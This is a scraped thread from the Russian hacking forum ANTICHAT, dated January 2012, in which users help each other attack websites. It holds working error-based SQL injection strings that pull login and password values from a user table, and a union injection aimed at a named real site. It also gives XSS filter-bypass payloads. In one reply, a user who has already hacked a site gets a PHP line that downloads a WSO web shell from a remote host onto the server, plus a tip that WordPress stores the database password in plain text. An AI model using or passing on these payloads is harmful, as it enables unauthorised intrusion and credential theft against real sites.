ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

14.01.2012, 01:12
|
|
Новичок
Регистрация: 21.02.2009
Сообщений: 3
Провел на форуме: 58401
Репутация:
0
|
|
Сообщение от shadowrun
shadowrun said:
Можно подробней?
кол-во возвращаемых строк при подобном запросе должно быть не больше 1ого. скорее всего ты пытаешься вывести логин не используя лимит и база отдаёт бОльшее кол-во строк, вызывая ошибку.
Сообщение от None
admin'or+1+and(select+1+from(select+count(*),conca t((select+login+from+cosm_users+
limit+0,1
),floor(rand(0)*2))x+from+information_schema.table s+grou p+by+x)a)--+a
limit+0,1 при выводе логина, ты скорее всего упустил.
|
|
|

14.01.2012, 01:43
|
|
Guest
Сообщений: n/a
Провел на форуме: 183267
Репутация:
84
|
|
Сообщение от d1v
d1v said:
кол-во возвращаемых строк при подобном запросе должно быть не больше 1ого. скорее всего ты пытаешься вывести логин не используя лимит и база отдаёт бОльшее кол-во строк, вызывая ошибку.
limit+0,1 при выводе логина, ты скорее всего упустил.
Нет. Все есть.
|
|
|
|

14.01.2012, 12:48
|
|
Guest
Сообщений: n/a
Провел на форуме: 102354
Репутация:
267
|
|
Сообщение от shadowrun
shadowrun said:
Нет. Все есть.
Код:
Code:
admin'or+1+and(select+1+from(select+count(*),concat((select+password+from+cosm_users+where+login='admin'),floor(rand(0)*2))x+from+information_schema.table s+group+by+group+by+x)a)--+a
Др. вариантов не вижу.
--
Помогите и мне! Как вывести таблицы:
Код:
Code:
http://www.ozerna[notforgoogle]ya42.ru/credit/form/LADA/Priora%204D/**/14'-9999.9+union+select+1,2,3,version(),5,6,7--+f
"_" заменяет на пробел кажется или я что-то не так делаю?
|
|
|
|

14.01.2012, 14:02
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме: 4512
Репутация:
0
|
|
Сообщение от NZT
NZT said:
Как можно искать активную xss незаметно чтобы обойтись только одним сообщением?(если нельзя редактировать) и чтобы никто ничего не заметил. Я вот это понять не могу. Заранее спасибо за ответ.
Для начала написать любое сообщение и определить, где оно выводится на странице.
1) Если вне HTML-тегов, достаточно проверить фильтрацию символа [B]
|
|
|

14.01.2012, 17:38
|
|
Guest
Сообщений: n/a
Провел на форуме: 6075
Репутация:
0
|
|
M_script большое тебе спасибо за отзыв, я его перечитал наверное раз 10 и я понял следущее но не уверен что я правильно все понял.
1)Ты имеешь виду если собшение обычное без добавок html то надо написать
2)Если то что я написал в кавычках осталось в исходном коде то нашел xss , если заменилось то всеравно может быть xss , хоть в статье для новичков я читал что если кавычки заменились то это облом.
2.1) если в исходном коде пусто то проверить символы < и >
3)Потом в скрипте с алертом вместо <> вписать < , > , если скрипт напишется в сообщении значит есть xss , да он не выполняется но все же будут видеть то что я написал. И если вмето замененых кавычек появятся обычные значит пробовать вписать скрипт с обычными кавычками.
3.1) Если в скрипте фильтруются
|
|
|
|

14.01.2012, 18:43
|
|
Новичок
Регистрация: 04.11.2004
Сообщений: 5
Провел на форуме: 4512
Репутация:
0
|
|
Примеры:
1)
Символы (, ), = никто фильтровать не будет. Закрывать тег необязательно. Если проходит [B]
[B]
[/QUOTE]
" if author else f"
YWxlcnQoJ1hTUycp - alert('XSS') в base64.
2)
Даже если кавычка экранируется
2.1)
В зависимости от функции-обрабочика может вообще не потребоваться обход фильтров. Но если какая-либо фильтрация мешает, можно использовать хтмл-сущности символов.
В myfunction() содержимое value передается как alert("test").
3)
Сообщение от None
a = 'XSS';
b = 'blablabla';
c = myfunction(a, b);
Закрываем строку, вставляем свой код.
Сообщение от None
a = '
';alert('test');b='
';
b = 'blablabla';
c = myfunction(a, b);
Тег script можно закрыть даже внутри строки.
Сообщение от None
a = '
[B]
3.1)
Сообщение от None
text = 'XSS';
document.write('' + text + '');
Сообщение от None
text = '
\x3Cscript\x3Ealert\x28\x27test\u0027\u0029\u003C\ u002Fscript\u003E
';
document.write('' + text + '');
Это лишь несколько общих примеров. Тема достаточно обширная и об этом можно написать еще много всего.
Сообщение от NZT
NZT said:
И это же получается не одно сообщение или подругому никак?
Расположение текста в коде можно посмотреть по чужим текстам, если до тебя кто-то уже писал на странице.
Сообщение от NZT
NZT said:
возможна ли в DVWA, xss на уровне high а то у меня ничего не получается )
Ни разу не пробовал проходить DVWA
|
|
|

14.01.2012, 18:51
|
|
Guest
Сообщений: n/a
Провел на форуме: 102354
Репутация:
267
|
|
Сообщение от faza02
faza02 said:
пахекал сайт, стал искать админку
нашел пару подозрительных файлов, открываю — шелл
попытался с него залиться, редактировать файлы, создавать папки — никак
могу только просматривать
есть вомзможность выполнять произвольный php код, но это мало чем помогло, загрузка файлов не работает
sm off
права есть
drwxrwxrwx на все папки
поискал юзера и пасс от бд
он ведь в wp-config.php находится?
не расшифровал
ну собстенно вопрос в том, что можно сделать?
Еслить можно выполнять код + папки на запись, то какая проблема?
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"]copy[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"http://site.ltd/wso.txt"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"/home/www/123.php"[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]
P.S. В wp-config.php пасс хранится в открытом виде.
|
|
|
|

14.01.2012, 20:18
|
|
Guest
Сообщений: n/a
Провел на форуме: 6075
Репутация:
0
|
|
M_script спасибо, я не много что понял из твоего последнего сообщения но ты меня навел на мысль что может уже кто то использовал html-теги до меня как и мне всего лишь надо заглянуть в source странички и проверить где возможна xss. Но , я тренируюсь в DVWA и там в уровне low проходит alert() , а вот в уровне medium не проходит и надо писать ript>alert()ript> но когда я это пишу чтобы проверить как мне вписать боевой скрипт мне выдает в коментарии ript> , это работает но появился подозрительный коментарий, можно ли этого как то избежать ? И скажи может ты знаешь , возможна ли в DVWA, xss на уровне high а то у меня ничего не получается ) А чтобы понять больше я думаю знания и опыт придут со временем, ведь я не собираюсь отступать )
Ты за несколько сообщений уже многому меня научил чего я абсолютно не знал и не догадывался. Спасибо.
|
|
|
|

15.01.2012, 07:25
|
|
Guest
Сообщений: n/a
Провел на форуме: 29020
Репутация:
55
|
|
Сообщение от None
а вот в уровне medium не проходит и надо писать ript>alert()ript> но когда я это пишу чтобы проверить как мне вписать боевой скрипт мне выдает в коментарии ript> , это работает но появился подозрительный коментарий, можно ли этого как то избежать ?
Я уже писал выше, там нужно
потому что вырезает только а не трогает.
Сообщение от None
И скажи может ты знаешь , возможна ли в DVWA, xss на уровне high а то у меня ничего не получается ) А чтобы понять больше я думаю знания и опыт придут со временем, ведь я не собираюсь отступать )
Именно в том случае xss нет. Но возможность обойти htmlspecialchars() есть только в том случае если уязвимый параметр выводится в ссылке и кодировка файла UTF-7.
|
|
|
|

15.01.2012, 12:38
|
|
Guest
Сообщений: n/a
Провел на форуме: 2229
Репутация:
0
|
|
как залить файл если работает Put Method ?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|